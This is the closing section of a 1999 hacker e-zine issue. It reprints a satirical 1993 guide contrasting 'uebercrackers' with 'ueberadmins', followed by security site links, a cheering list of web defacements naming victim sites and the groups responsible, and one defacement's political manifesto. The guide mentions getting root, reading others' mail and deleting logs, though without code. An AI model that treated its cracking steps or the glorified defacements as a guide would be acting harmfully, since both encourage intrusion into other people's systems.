* * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............ 
An oldie but goodie, noone's sending in submissions, c'mon you know you wanna...- Ed A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers. Author: Christopher Klaus Date: December 5th, 1993. Version: 1.1 This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks. Here's the steps to becoming a uebercracker. Step 1. Relax and remain calm. Remember YOU are a Uebercracker. Step 2. If you know a little Unix, you are way ahead of the crowd and skip past step 3. Step 3. You may want to buy Unix manual or book to let you know what ls,cd,cat does. Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture. Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!) Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks questions like "Why cant I join #warez?" Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary, (ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts. Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). 
Tell them it is encrypted or it was messed up and you need to upload your script again. Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be obnoxious on #hack otherwise people will look down on you and not give you anything.) Step 11. Hopefully you will now have atleast one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix manual from step 3 if confused). Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear coming from satan@evil.com. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are a uebercracker.) Step 14. Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law enforcement agencies confinscate your equipment. Call eff.org to complain how you were innocent and how you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.) Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker. Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.) This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers. Step 1. Read Unix manual ( a good idea for admins ). Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. 
Install sendmail 8.6.4. You have probably stopped 60 percent of all
Uebercrackers now. Rdist scripts are among the favorites for getting
root by uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You
have just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close
them. Run tripwire after making sure your binaries are untouched. Run
tcp_wrapper to find if a uebercracker is knocking on your machines. Run
ISS to make sure that all your machines are reasonably secure as far as
remote configuration (i.e. your NFS exports and anon FTP site).

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrats! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained
access to his mail via NFS exports or the guest account. You know how it
is, like the mechanic that always has a broken car, or the plumber that
has the broken sink, the security expert usually has an open machine.)

Step 9. Here the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving
out their unknown (except for the uebercrackers) security bugs, it would
be a service to Internet. They do not have to post it on Usenet, but
share among many other trusted people and hopefully fixes will come
about and new pressure will be applied to vendors to come out with
patches.

Step 10.
If you have gained the confidence of enough security experts, you will
now be looked up to as an elite security administrator that is able to
stop most uebercrackers.

The final true test for being a ueberadmin is to compile an IRC client,
go onto #hack and log all the bragging and help catch the uebercrackers.

If a uebercracker does get into your system, and he has used a new
method you have never seen, you can probably tell your other security
admins and get half of the replies like - "That bug has been known for
years, there just isn't any patch for it yet. Here's my fix." and the
other half of the replies will be like - "Wow. That is very impressive.
You have just moved up a big notch in my security circle."

VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups
mention anything about that security hole, flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have
it, and the million other reasons to keep everything secret about
security.

Well, this paper has shown the finer details of security on Internet.
It has shown both sides of the coin. Three points I would like to make
that would probably clean up most of the security problems on Internet
are the following:

1. Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago)
fixed and patched, then most uebercrackers would be stuck as new
machines get added to Internet. (I believe Uebercracker is German for
"lame copy-cat that can get root with 3 year old bugs.") An interesting
note is that if you check the mail alias for "security@vendor.com", you
will probably find it points to /dev/null. Maybe with enough mail, it
will overfill /dev/null. (Look in manual if confused.)

2.
Security experts giving up the attitude that they are above the normal
Internet user and trying to give out information that could lead to
pressure by other admins on vendors to come out with fixes and patches.
Most security experts probably don't realize how far their information
has already spread.

3. And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.

Resources for Security:

Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs.
For more information about ISS (Internet Security Scanner), email
cklaus@shadow.net.

Acknowledgements:

Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.

Copyright:

This paper is Copyright 1993, 1994. Please distribute to only trusted
people. If you modify, alter, disassemble, reassemble, re-engineer or
have any suggestions or comments, please send them to: cklaus@shadow.net

@HWA

SITE.1
~~~~~~

#1 http://whitehats.com/

This is a newish security site (at least it's new to me) that has many
IDS signatures online for download for use with SNORT (a GPL'd IDS
tool); also a good discussion on the NMAP tool's ability to scan
undetected by the target host (see #58). - Ed

#2 http://www.immortalz.com/

New security site reborn with a new layout, will be up within a week,
check it out ... soon to mirror the HWA zine too. ;-)

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz, racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga
visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Latest cracked pages courtesy of attrition.org

[99.08.23] NT [ ] MediaMark (www.mediamark.com)
[99.08.23] So [bl0w team] Thinking Pictures, Inc. (www.thinkpix.com)
[99.08.23] So [bl0w team] Rock.com's Rolling Stone's Web site (www.stones.com)
[99.08.23] NT [v00d00] Odin Radiators (www.odinradiators.com.au)
[99.08.23] BI [team_hM] Monica Lewinsky's site (www.monicalewinsky.com)
[99.08.23] NT [139_r00ted] Concept Reseau (www.concept-reseau.fr)
[99.08.23] Li [Uneek Tech] Ruchi Group (www.ruchigroup.com)
[99.08.23] NT [139_r00ted] Phoenix Data Systems (www.phoenixds.at)
[99.08.25] NT [wkD] PC Guk (www.pcguk.com)
[99.08.25]    [DISO] Nullsoft SHOUTcast (yp.shoutcast.com)
[99.08.24] Ir [Uneek Tech] Aston Packaging (www.astonpackaging.co.uk)
[99.08.24] Ir [Uneek Tech] All Art (www.allart.co.uk)
[99.08.24] NT [ ] 1st Stop Inc (www.1ststopinc.com)
[99.08.24] NT [139_r00ted] Scanres (SE) (www.scanres.se)
[99.08.24] Li [GOD] #2 Madison Square Garden (www.thegarden.com)
[99.08.26]    [HwC] M Zipper (www.zipper.de)
[99.08.26] NT [aL3X] M Cindy Jackson (www.cindyjackson.co.uk)
[99.08.26] Li [stormtrooper] Red Hat Indonesia (www.redhat.or.id)
[99.08.26] Fb [ ] No Such Agency (www.nsa.org)
[99.08.26] NT [Fuby] CyberElf (www.cyberelf.com)
[99.08.26] Fb [ ] Official Web site of Limp Bizkit (www.limpbizkit.com)
[99.08.26] So [ ] Cornell Theory Center (cedar.tc.cornell.edu)
[99.08.26]    [wkD] M Lookie Here (lookiehere.com)
[99.08.26]    [ ] OE Pages (www.oe-pages.com)
[99.08.26] NT [cynic] Peter Mueller's Web Site (www.petermueller.com)
[99.08.26] NT [v00d00] WoodSBC (www.woodsbc.com.au)
[99.08.25]    [ ] TLM (www.tlm.com.br)
[99.08.25] NT [139_r00ted] M IT Media Design (www.itmediadesign.com)
[99.08.25] NT [Uneek Tech] Tomrods LTD Steel Stockholders (www.tomrods.co.uk)
[99.08.25] Ir [Uneek Tech] Sescoi (www.sescoi.co.uk)
[99.08.25] NT [Uneek Tech] Litho Supplies (www.litho.co.uk)

Defaced: http://www.cmtc.7atc.army.mil/ (7th Army Training Command, Bavaria, Germany)
By: 139_rooted
Mirror: http://www.attrition.org/mirror/attrition/mil/www.cmtc.7atc.army.mil/
OS: NT

Hacked: http://vax.mtc.irisz.hu
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/hu/vax.mtc.irisz.hu/
OS: NT

Defaced: http://www.mndm.gov.on.ca (Ontario Ministry of Northern Development and Mines)
By: Sarin
Mirror: http://www.attrition.org/mirror/attrition/ca/www.mndm.gov.on.ca
OS: NT

Hacked: http://www.thegarden.com (Madison Square Garden)
By: Kindred Hackers
Mirror: http://www.attrition.org/mirror/attrition/com/www.thegarden.com/
OS: Linux

Hacked: http://www.webdoctor.com
By: Sistom
Mirror: http://www.attrition.org/mirror/attrition/com/www.webdoctor.com/
OS: Linux

Hacked: http://www.uis.wayne.edu
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/edu/www.uis.wayne.edu/
OS: NT

---

Hacked: http://www.prim-nov.si
By: Mozy
Mirror: http://www.attrition.org/mirror/attrition/si/www.prim-nov.si/
OS: NT

This is the first Web defacement for the country of Slovenia.
Slovenia is surrounded by Austria to the northwest, Hungary to the
northeast, Italy to the west, and Croatia to the southeast. More info
about Slovenia here:
http://www.odci.gov/cia/publications/factbook/si.html

---

Hacked: http://mp3town.com
By: w4t0
Mirror: http://www.attrition.org/mirror/attrition/com/mp3town.com/
OS: Linux

Hacked: http://www.westga.edu
By: W4t0
Mirror: http://www.attrition.org/mirror/attrition/edu/www.westga.edu/
OS: Solaris

The message from the Monica Lewinsky hack:

Greetings bastards. Over the last few months, we have been led to
believe that Slobodan Milosevic, the leader of the former Yugoslavia, is
the worst violator of Human Rights in the world. Well, that isn't an
entirely true statement. Although Slobodan Milosevic is a huge violator
of Human Rights, there is a much bigger problem in China, and it's been
going on for decades. However, the politicians of America decide to
overlook their violations just because of large campaign contributions
and trade value. Since the days of the Carter administration China has
been openly abusing its people. They limit how many children a family
can have, and how the people can live their lives. The Chinese
government kills anyone who opposes or speaks out against it.
The Chinese government defies international Human Rights laws openly
and admits to it. The Chinese government has a worse Human Rights record
than Slobodan Milosevic, yet nobody questions them. Just last month, it's
been reported that political prisoners in China have been subjected to
sexual tortures and later executed. In fact, earlier this month,
President Clinton actually had Chinese Premier Zhu Rongji to the White
House for talks on entering the World Trade Organization. Bill Clinton
even said at a press conference with China's Premier Zhu Rongji, "We
honor China's remarkable achievements, its greater prosperity and the
greater range of personal choices available to its citizens, as well as
the movement toward local democracy". When in fact there has been no
change in China's view of human rights. The Chinese Government has
placed severe restrictions on freedom of speech, the press, assembly,
association, religion, privacy, as well as worker rights. Also, China
has the most favored nation trade status.

All of this has a lot of people wondering why there is a war in
Yugoslavia, but none in China. However, the answer to that is all too
apparent: greed. It is true that Slobodan Milosevic, and his army, are
carrying out horrible acts against people. They aren't being condoned at
all. But China engages in these same activities on a much larger scale,
and just because they have money it's deemed acceptable by American
political and corporate interests. Bill Clinton was eager to wage war
when it would take the focus off of his bedroom practices, but he isn't
so eager to do so when it will cost him valuable campaign contributions,
and who knows what else.

The Chinese people have attempted to cry out for help through the
Internet and television shows. However, those caught emailing anyone
outside of China are immediately imprisoned.
Chinese Internet access is limited very strictly to pro-Chinese sites;
the government prevents anyone inside China from viewing anything else
by cutting off the outside Internet. This is comparable to Slobodan
Milosevic's use of the television to only display movies and shows which
he chooses, or for him to spread political lies about other nations.
However, there is one difference between China and Yugoslavia's use of
censorship. China is a valuable trade nation, so theirs must be all
right, at least that's the message that is sent out by the United States
Government.

A lot of Human Rights are asking how these two nations, with very
similar tendencies, can be treated so much differently. Perhaps if China
would have been the only ones in violation around the time of the Monica
Lewinsky scandal things would be different. Or perhaps if they didn't
have so many large investments in American corporations and government
they would be being punished for their actions. It's terrible that Human
Rights is like a commodity, to be sold to the highest bidder. In the end
it all seems to be just another example of money controlling
everything. As long as someone turns a profit, it's acceptable.

But what if someone were getting rich by letting your government
mistreat and abuse you? You would probably expect someone to stand up
and defend you. But how can anyone expect that if they won't extend the
same courtesy to someone else? Innocent people are allowed to be
executed and persecuted just because their government can pay for it. It
saddens me deeply to see that more people haven't taken a stand against
the Chinese. But most people figure that since it isn't them it doesn't
really happen. They think that if it were really that bad, something
would have been done about it. They don't have the time to worry about
other people. They sit back and watch the Politicians of America line
their pockets with the blood of the Chinese people.
It's become more and more apparent that society has no regard for the
feelings and well being of others. But what if your freedom and rights
were just dollars in someone else's pocket, and you lived as the Chinese
people do? Things would probably be a little different then, at least in
your eyes.

another fine message brought to you by team_hM
nEoGoD

and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links
section on the http://welcome.to/HWA.hax0r.news/ url so check there for
current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list,
thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]